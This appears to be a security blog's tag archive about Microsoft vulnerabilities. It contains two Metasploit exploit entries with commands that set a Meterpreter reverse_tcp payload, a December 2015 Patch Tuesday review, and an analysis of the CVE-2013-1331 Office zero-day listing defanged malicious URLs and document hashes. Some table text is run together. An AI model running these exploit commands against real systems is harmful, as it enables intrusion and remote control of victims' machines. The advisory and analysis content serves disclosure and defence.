Tag Archives: Microsoft

CVE-2013-3893 Microsoft Internet Explorer SetMouseCapture UAF

Timeline :

Vulnerability discovered exploited in the wild the 2013-08-23
Microsoft publish Microsoft Security Advisory 288750 the 2014-09-17
Microsoft publish a Fix it workaround the 2013-09-17
Metasploit PoC provided the 2013-09-30
Patched by the vendor via MS13-080 the 2013-10-08

PoC provided by :

Unknown
sinn3r
Rich Lundeen

Reference(s) :

CVE-2013-3893
MS13-080
MSA-2887505

Affected version(s) :

Internet Explorer 6, 7, 8, 9, 10 and 11.

Tested on :

with Internet Explorer 8 on Windows XP SP3

Description :

This module exploits a use-after-free vulnerability that currents targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well. The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a reference during an event. An attacker first can setup two elements, where the second is the child of the first, and then setup a onlosecapture event handler for the parent element. The onlosecapture event seems to require two setCapture() calls to trigger, one for the parent element, one for the child. When the setCapture() call for the child element is called, it finally triggers the event, which allows the attacker to cause an arbitrary memory release using document.write(), which in particular frees up a 0x54-byte memory. The exact size of this memory may differ based on the version of IE. After the free, an invalid reference will still be kept and pass on to more functions, eventually this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary code execution) when this function attempts to use this reference to call what appears to be a PrivateQueryInterface due to the offset (0x00). To mimic the same exploit found in the wild, this module will try to use the same DLL from Microsoft Office 2007 or 2010 to leverage the attack.

Commands :

use exploit/windows/browser/ie_setmousecapture_uaf
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access

Timeline :

Vulnerability discovered by James Forshaw
Patched by the vendor the 2013-03-12
PoC provided by Vitaliy Toropov the 2013-10-23
Discovered exploited into Exploit Kits the 2013-11-13
Metasploit PoC provided the 2013-11-22

PoC provided by :

James Forshaw
Vitaliy Toropov
juan vazquez

Reference(s) :

CVE-2013-0074
CVE-2013-3896
OSVDB-91147
OSVDB-98223
BID-58327
BID-62793
MS13-022
MS13-087

Affected version(s) :

All versions of Microsoft Silverlight 5 bellow version 5.1.20125.0

Tested on :

Windows 7 SP1 with Microsoft Silverlight version 5.1.20125.0

Description :

This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an unsafe manner. Since it is accessible for untrusted code (user controlled) it’s possible to dereference arbitrary memory which easily leverages to arbitrary code execution. In order to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class from System.Windows.dll. This module has been tested successfully on IE6 – IE10, Windows XP SP3 / Windows 7 SP1.

Commands :

use exploit/windows/browser/ms13_022_silverlight_script_object
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

sysinfo
getuid

Microsoft December 2015 Patch Tuesday Review

Microsoft has release, December 8th 2015, during his December 2015 Patch Tuesday, two updated security advisory, one new security advisory and twelve security bulletins. On the twelve security bulletins eight of them have a Critical security rating.

Microsoft Security Advisory 2755801

MSA-2755801,released during September 2012, has been updated. The security advisory is concerning updates for vulnerabilities in Adobe Flash Player in Internet Explorer 10, Internet Explorer 11 and Microsoft Edge. KB3119147 has been released for supported editions of for:

  • Internet Explorer 10 on Windows 8, Windows Server 2012, and Windows RT;
  • Internet Explorer 11 on Windows 8.1, Windows Server 2012 R2, Windows RT 8.1, and Windows 10;
  • Microsoft Edge on Windows 10.

The update addresses the vulnerabilities described in Adobe Security bulletin APSB15-32.

Microsoft Security Advisory 3057154

MSA-3057154, release during July 2015, has been updated. The security advisory is concerning harden scenarios in which Data Encryption Standard (DES) encryption keys are used with accounts to ensure that domain users, services, and computers that support other encryption types are not vulnerable to credential theft or elevation of privilege attacks.  KB3057154 has been released for:

  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 R2 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 R2 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for x64-based Systems
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for x64-based Systems
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows RT
  • Windows RT 8.1
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012 R2 (Server Core installation)

Microsoft Security Advisory 3123040

MSA-3123040 concerns an SSL/TLS digital certificate for *.xboxlive.com for which the private keys were inadvertently disclosed. The certificate could be used in attempts to perform man-in-the-middle attacks. It cannot be used to issue other certificates, impersonate other domains, or sign code. This issue affects all supported releases of Microsoft Windows. KB2677070 has been release for:

  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for x64-based Systems
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for x64-based Systems
  • Windows RT
  • Windows RT 8.1
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows 10
  • Windows 10 Version 1511
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems (Server Core installation)
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012 R2 (Server Core installation)
  • Windows Phone 8
  • Windows Phone 8.1
  • Windows 10 Mobile

MS15-124 Cumulative Security Update for Internet Explorer

MS15-124 security update, classified as Critical, allowing remote code execution, is the fix for 30 privately reported vulnerabilities in Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, and Internet Explorer 11. KB3116180 has been release for fixing the bellow vulnerabilities:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-60839.3NoNoHui Gao of Palo Alto Networks
CVE-2015-61349.3NoNoSkyLined, working with HP’s Zero Day Initiative
CVE-2015-61355.0NoNoSimon Zuckerbraun, working with HP’s Zero Day Initiative
CVE-2015-61369.3NoNo- Simon Zuckerbraun, working with HP’s Zero Day Initiative
- An anonymous researcher, working with HP’s Zero Day Initiative
- Yuki Chen of Qihoo 360Vulcan Team
CVE-2015-61384.3NoNoNone
CVE-2015-61399.3NoNoMichal Bentkowski
CVE-2015-61409.3NoNoBo Qu of Palo Alto Networks
CVE-2015-61419.3NoNoB6BEB4D5E828CF0CCB47BB24AAC22515, working with HP’s Zero Day Initiative
CVE-2015-61429.3NoNoSimon Zuckerbraun, working with HP’s Zero Day Initiative
CVE-2015-61439.3NoNoNone
CVE-2015-61444.3NoNoMasato Kinugawa
CVE-2015-61459.3NoNoCong Zhang and Yi Jiang, working with Beijing VRV Software Co., LTD.
CVE-2015-61469.3NoNoBo Qu of Palo Alto Networks
CVE-2015-61479.3NoNoB6BEB4D5E828CF0CCB47BB24AAC22515, working with HP’s Zero Day Initiative
CVE-2015-61489.3NoNoA3F2160DCA1BDE70DA1D99ED267D5DC1EC336192, working with HP’s Zero Day Initiative
CVE-2015-61499.3NoNoB6BEB4D5E828CF0CCB47BB24AAC22515, working with HP’s Zero Day Initiative
CVE-2015-61509.3NoNoB6BEB4D5E828CF0CCB47BB24AAC22515, working with HP’s Zero Day Initiative
CVE-2015-61519.3NoNoLi Kemeng of Baidu Security Team(x-Team) , working with HP’s Zero Day Initiative
CVE-2015-61529.3NoNoMoritz Jodeit of Blue Frost Security
CVE-2015-61539.3NoNoShi Ji (@Puzzor)
CVE-2015-61549.3NoNoChenDong Li and YunZe Ni of Tencent
CVE-2015-61559.3NoNoZheng Huang of the Baidu Scloud XTeam, working with VeriSign iDefense Labs
CVE-2015-61569.3NoNoAnonymous contributor, working with VeriSign iDefense Labs
CVE-2015-61574.3NoNoZheng Huang of the Baidu Scloud XTeam, working with VeriSign iDefense Labs
CVE-2015-61589.3NoNoZheng Huang of the Baidu Scloud XTeam, working with VeriSign iDefense Labs
CVE-2015-61599.3NoNoZheng Huang of the Baidu Scloud XTeam
CVE-2015-61609.3NoNoGarage4Hackers, working with HP’s Zero Day Initiative
CVE-2015-61614.3NoNoRh0
CVE-2015-61629.3NoNoWenxiang Qian of TencentQQBrowser
CVE-2015-61646.8NoNoNone

MS15-125 Cumulative Security Update for Microsoft Edge

MS15-125 security update, classified as Critical, allowing remote code execution, is the fix for 15 privately reported vulnerabilities in Microsoft Edge on Windows 10. KB3116184 has been released for fixing the bellow vulnerabilities:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61399.3NoNoMichal Bentkowski
CVE-2015-61409.3NoNoBo Qu of Palo Alto Networks
CVE-2015-61429.3NoNoSimon Zuckerbraun, working with HP’s Zero Day Initiative
CVE-2015-61489.3NoNoA3F2160DCA1BDE70DA1D99ED267D5DC1EC336192, working with HP’s Zero Day Initiative
CVE-2015-61519.3NoNoLi Kemeng of Baidu Security Team(x-Team) , working with HP’s Zero Day Initiative
CVE-2015-61539.3NoNoShi Ji (@Puzzor)
CVE-2015-61549.3NoNoChenDong Li and YunZe Ni of Tencent
CVE-2015-61559.3NoNoZheng Huang of the Baidu Scloud XTeam, working with VeriSign iDefense Labs
CVE-2015-61589.3NoNoZheng Huang of the Baidu Scloud XTeam, working with VeriSign iDefense Labs
CVE-2015-61599.3NoNoZheng Huang of the Baidu Scloud XTeam
CVE-2015-61614.3NoNoRh0
CVE-2015-61689.3NoNoSkyLined, working with HP’s Zero Day Initiative
CVE-2015-61694.3NoNoNone
CVE-2015-61706.8NoNoMario Heiderich of Cure53
CVE-2015-61764.3NoNoMasato Kinugawa

MS15-126 Cumulative Security Update for JScript and VBScript

MS15-126 security update, classified as Critical, allowing remote code execution, is the fix for 2 privately reported vulnerabilities in VBScript scripting engine in Microsoft Windows. KB3116178 has been released for fixing the bellow vulnerabilities:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61355.0NoNoSimon Zuckerbraun, working with HP’s Zero Day Initiative
CVE-2015-61369.3NoNo- Simon Zuckerbraun, working with HP’s Zero Day Initiative
- An anonymous researcher, working with HP’s Zero Day Initiative
- Yuki Chen of Qihoo 360Vulcan Team

MS15-127 Security Update for Microsoft Windows DNS

MS15-127 security update, classified as Critical, allowing remote code execution, is the fix for 1 privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if an attacker sends specially crafted requests to a DNS server. KB3100465 has been released for fixing the bellow vulnerability:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61259.3NoNoNone

MS15-128 Security Update for Microsoft Graphics Component

MS15-128 security update, classified as Critical, allowing remote code execution, is the fix for 3 privately reported vulnerabilities in Microsoft Windows, .NET Framework, Microsoft Office, Skype for Business, Microsoft Lync, and Silverlight. The vulnerabilities could allow remote code execution if a user opens a specially crafted document or visits a webpage that contains specially crafted embedded fonts. KB3104503 has been released for fixing the bellow vulnerabilities:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61069.3NoNoSteven Vittitoe of Google Project Zero
CVE-2015-61079.3NoNoSteven Vittitoe of Google Project Zero
CVE-2015-61089.3NoNoNone

MS15-129 Security Update for Silverlight

MS15-129 security update, classified as Critical, allowing remote code execution, is the fix for 3 privately reported vulnerabilities in Microsoft Silverlight. KB3106614 has been released for fixing the bellow vulnerabilities:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61144.3YesYesNone
CVE-2015-61654.3NoNoMarcin 'Icewall' Noga of Cisco Talos
CVE-2015-61669.3NoNoNone

CVE-2015-6114 vulnerability details have been disclosed publicly by @_Icewall from Cisco Talos vulndev team.

MS15-130 Security Update for Microsoft Uniscribe

MS15-130 security update, classified as Critical, allowing remote code execution, is the fix for 1 privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user opens a specially crafted document or visits an untrusted webpage that contains specially crafted fonts. KB3108670 has been released for fixing the bellow vulnerability:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61309.3NoNoHossein Lotfi, Secunia Research (now part of Flexera Software)

MS15-131 Security Update for Microsoft Office

MS15-131 security update, classified as Critical, allowing remote code execution, is the fix for 6 privately reported vulnerabilities in Microsoft Windows. Interesting to see that CVE-2015-6124 has been privately reported but seen as exploited in wild. KB3116111 has been released for fixing the bellow vulnerabilities:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-60409.3NoNoSteven Vittitoe of Google Project Zero
CVE-2015-61189.3NoNoKai Lu of Fortinet's FortiGuard Labs
CVE-2015-61229.3NoNoSteven Vittitoe of Google Project Zero
CVE-2015-61249.3NoYesNone
CVE-2015-61729.3NoNoHaifei Li of Intel Security IPS Research Team
CVE-2015-61779.3NoNoKai Lu of Fortinet's FortiGuard Labs

MS15-132 Security Update for Microsoft Windows

MS15-132 security update, classified as Important, allowing remote code execution, is the fix for 3 privately reported vulnerabilities in Microsoft Windows. KB3116162 has been released for fixing the bellow vulnerabilities:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61287.2YesYes- Steven Vittitoe of Google Project Zero
- Parvez Anwar
CVE-2015-61327.2NoNoNone
CVE-2015-61337.2NoNoNone

CVE-2015-6128 vulnerability details have been disclosed publicly with a proof of concept.

MS15-133 Security Update for Windows PGM

MS15-133 security update, classified as Important, allowing elevation of privilege, is the fix for 1 privately reported vulnerability in Microsoft Windows. KB3116130 has been released for fixing the bellow vulnerability:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61267.2NoNoNone

MS15-134 Security Update for Windows Media Center

MS15-134 security update, classified as Important, allowing remote code execution, is the fix for 2 privately reported vulnerabilities in Microsoft Windows. KB3108669 has been released for fixing the bellow vulnerabilities:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61274.3YesYesFrancisco Falcon of Core Security
CVE-2015-61319.3YesYesZhang YunHai of NSFOCUS Security Team

CVE-2015-6127 vulnerability details have been disclosed publicly with a proof of concept.

CVE-2015-6131 vulnerability details have been disclosed publicly with a proof of concept.

MS15-135 Security Update for Windows Kernel-Mode Drivers

MS15-135 security update, classified as Important, allowing elevation of privilege, is the fix for 4 privately reported vulnerabilities in Microsoft Windows. Interesting to see that CVE-2015-6175 has been publicly reported and also seen exploited in wild. KB3119075 has been released for fixing the bellow vulnerabilities:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61717.2NoNoNils Sommer of bytegeist, working with Google Project Zero
CVE-2015-61737.2NoNoNils Sommer of bytegeist, working with Google Project Zero
CVE-2015-61747.2NoNoNils Sommer of bytegeist, working with Google Project Zero
CVE-2015-61757.2YesYesNone

MS13-051 / CVE-2013-1331 What We Know About Microsoft Office Zero Day

MS13-051 Microsoft Office bulletin was release Tuesday 11th 2013 during the traditional Patch Tuesday. This bulletin fix one vulnerability,  CVE-2013-1331, with a base CVSS score of 9.3 and targeting Microsoft Office 2003 and Office for Mac (2011). This vulnerability allow  remote code execution and was reported by Andrew Lyons and Neel Mehta of Google Inc.

Microsoft has also release additional information’s and it appears that some “bad guys” were using this vulnerability as a zero-day in targeted attacks. The vulnerability is related on how Microsoft Office render malformed PNG files leading to a classic stack based buffer overflow.

Malicious Office documents were referencing a malicious PNG file loaded from Internet and hosted on a remote servers. Remote servers were using scripts in order to avoid multiple times exploitation from the same source. Microsoft believe that attacks were limited to Indonesia and Malaysia.

Microsoft provided some examples of URLs invoked by the malicious Office document, and some hashes of the malicious Office binary format documents.

  • hXXp://intent.nofrillspace.com/users/web11_focus/4307/space.gif
  • hXXp://intent.nofrillspace.com/users/web11_focus/3807/space.gif
  • hXXp://mister.nofrillspace.com/users/web8_dice/3791/space.gif
  • hXXp://mister.nofrillspace.com/users/web8_dice/4226/space.gif
  • hXXp://www.bridginglinks.com/somebody/4698/space.gif
  • hXXp://www.police28122011.0fees.net/pages/013/space.gif
  • hXXp://zhongguoren.hostoi.com/news/space.gif
Information Gathering on “intent.nofrillspace.com

By doing some researches we can find a Google cached Excel document mentioning this domain name the 2011-12-29. Domain name is mentioned as a gateway for malicious activities. Actually the web site is down, but associated IP was 80.93.50.73, hosted in the Russian Federation.

No Frill Space” is a hosting company offering free web spaces. The company web site was still up, regarding WayBack Machine, the May 28th 2013. No additional information’s are available.

intent.nofrillspace.com-document

Information Gathering on “mister.nofrillspace.com

By doing some researches we can find a Google cached web page as it appeared on 27 May 2013. Since, like the previous domain, the web site is no more available. No additional information’s are available.

mister-nofrillspace-com-webpage

Information Gathering on “www.bridginglinks.com

Like “No Frill Space“, “BRIDGING LINKS” is a hosting company offering free web spaces. The company web site was still up, regarding WayBack Machine, the May 21th 2013. “www.bridginglinks.com” was hosted on 85.17.143.51 located in Netherlands.

If we take a look on urlQuery, we can see a submission dating of April 4th 2013, mentioning an interesting URL “hXXp://www.bridginglinks.com/somebody/4698/vw.php“. As you can see the path is the same as the path mentioned by Microsoft. “vw.php” could be one of the file used to avoid multiple times exploitation.

Joe Sandbox is also referencing Report 1482, no more available, that refer a URL “hXXp://www.bridginglinks.com/somebody/4688/vw.php?i=b95146-8a76c6cb7d84148d95ab5a4921b3839c” and a name of a Word document “virus_suspected.doc“. Associated MD5 of the document is “714876fdce62371da08c139377f23d76“, was submitted March 3th 2013, with a file size of 113.0 KB.

my-sample

With the MD5 we can found a VirusTotal sample. Creation date of this document was February 25th 2013. Title of the document is “VN h?c gì t? v? Philippines ki?n TQ” that seem to be Vietnamese and could be translated to “VN learn from China’s conditions for Philippines“.

Document title seem to be related to the events of beginning of this year between China and Philippines regarding territory conflicts.

Here under a screenshot of the sample

CVE-2013-1331-sample

@mwtracker also submitted a sample on Cryptam June 13th 2013.

Update of June 16th 2013

After doing some further investigations we noticed another Word sample (f85eaad502e51eafeae0430e56899d9b) submitted to VirusTotal October 28th 2009 and that has a creation date of October 26th 2009. A re-submission of this sample clearly detect CVE-2013-1331 !

By analyzing this sample title of the document is “The corruption of Mahathir” from autor “585“. “The corruption of Mahathir” document is a reference to Mahathir Mohamad a Malaysian politician who was the fourth Prime Minister of Malaysia, and the document is an adaptation of a Bangkok Post article to remind people how the country has been damaged by Dr M, UMNO and his cronies.

The-corruption-of-Mahathir

Like the previous sample, this sample is referencing “www.bridginglinks.com” and has exactly the same patterns.

space-gif-2

Update of June 17th 2013

Microsoft has reference some hashes of the malicious Office documents. Here under more detailled information’s on these documents. All these malicious documents are actually only detected by Avast and Symantec.

35a6bbc6dda6a1b3a1679f166be11154 Office document

Document theme is related to telecommunications and has “Telco – XX??2013??????????” as title, that could be translated to “Telco – XX company in 2013 described the core network building program“. The document was created Wednesday March 6th 2013 and last saved by “abc“. The document initiate connexions to “hXXp://zhongguoren.hostoi.com/news/space.gif“.

zhongguoren-office-doc

zhongguoren-link

fde37e60cc4be73dada0fb1ad3d5f273 Office document

Document theme is related to Susilo Bambang Yudhoyono an Indonesian politician and retired Army general officer who has been President of Indonesia since 2004. Document title is “Macam-macam critis terhadap SBY dan gerakan kabinet di situs Gerakan Anti SBY II” that could be translated to “Various critis against SBY cabinet and movement at the site of the anti SBY II“. The document was created Monday October 31th 2011 and last saved by “xmuser“. The document initiate connexions to “hXXp://mister.nofrillspace.com/users/web8_dice/4226/space.gif“.

mister-office-doc

mister-link

2f1ab543b38a7ad61d5dbd72eb0524c4 Office document

Document theme is related to Chinese zodiac previsions for 2011, and document title is “Forecast for 2011“. The document was created Monday February 7th 2011 and last saved by “xmuser“. The document initiate connexions to “hXXp://intent.nofrillspace.com/users/web11_focus/3807/space.gif“.

intent-office-doc

intent-link

28e81ca00146165385c8916bf0a61046 Office document

Document theme is Malaysian Telco. The document was created by “PDRM” and last saved by “abc“, also creation date of the document is Sunday October 14th 2012. The document initiate connexions to “hXXp://www.police28122011.0fees.net/pages/013/space.gif“.

police28122011-office-doc

police28122011-link

7eb17991ed13960d57ed75c01f6f7fd5 Office document

Document theme is Indoleaks, an Indonesian equivalent of Wikileak, and document title is “Indoleaks, ‘Wikileaksnya’ Indonesia“. The document was created by “3565“, last saved by “xmuser” and created Sunday January 23th 2011. The document initiate connexions to “hXXp://mister.nofrillspace.com/users/web8_dice/3791/space.gif“.

mister-office-doc2

mister-link2

70511e6e75aa38a4d92cd134caba16ef Office document

Document theme is surveillance devices with document title “Top 11 Aerial Surveillance Devices“. The document was last saved by “xmuser” and created Tuesday January 3th 2012. The document initiate connexions to “hXXp://intent.nofrillspace.com/users/web11_focus/4307/space.gif

intent-office-doc2

intent-link2

Conclusions

Here under a recap table of all behaviors

MD5AuthorLast Saved ByCreation DateLast Saved DateDomainParams
714876fdce62371da08c139377f23d76SYSTEMSYSTEM2013-02-242013-02-24www.bridginglinks.com95146-555210c567278074917c1d11f25a6221
f85eaad502e51eafeae0430e56899d9b585-2009-11-262009-11-26www.bridginglinks.com41977-9c477a3c3bf9724fbd985772f6c50ef0
35a6bbc6dda6a1b3a1679f166be11154Userabc2013-03-062013-03-06zhongguoren.hostoi.com2064-ccca749e1a0e6806503c83048bb643d3
fde37e60cc4be73dada0fb1ad3d5f273-xmuser2011-10-312011-10-31mister.nofrillspace.com81425-3b068ea3d53786a94aaa715c7692a0a1
2f1ab543b38a7ad61d5dbd72eb0524c4-xmuser2011-02-072011-02-07intent.nofrillspace.com67575-80f27a85a4383ea2f92e8ba46c728ba3
28e81ca00146165385c8916bf0a61046PDRMabc2012-10-142012-10-14www.police28122011.0fees.net013-8354f8a7f3c21f58d7dbfa2a943c88b8
7eb17991ed13960d57ed75c01f6f7fd53565xmuser2011-01-232011-01-23mister.nofrillspace.com66995-83fcb7c8e552c81da5611e93a856a399
70511e6e75aa38a4d92cd134caba16ef-xmuser2012-01-032012-01-03intent.nofrillspace.com84435-81782ff9e4e204717db82d2e43a76f2d

My personal opinion is that:

  • I can clearly confirm that the zero-day was exploited in the wild since minimum February 2013 October 2009
  • the campaign was active since a while and has surely target other victims than previously thought.

I will keep you in touch with additional information’s.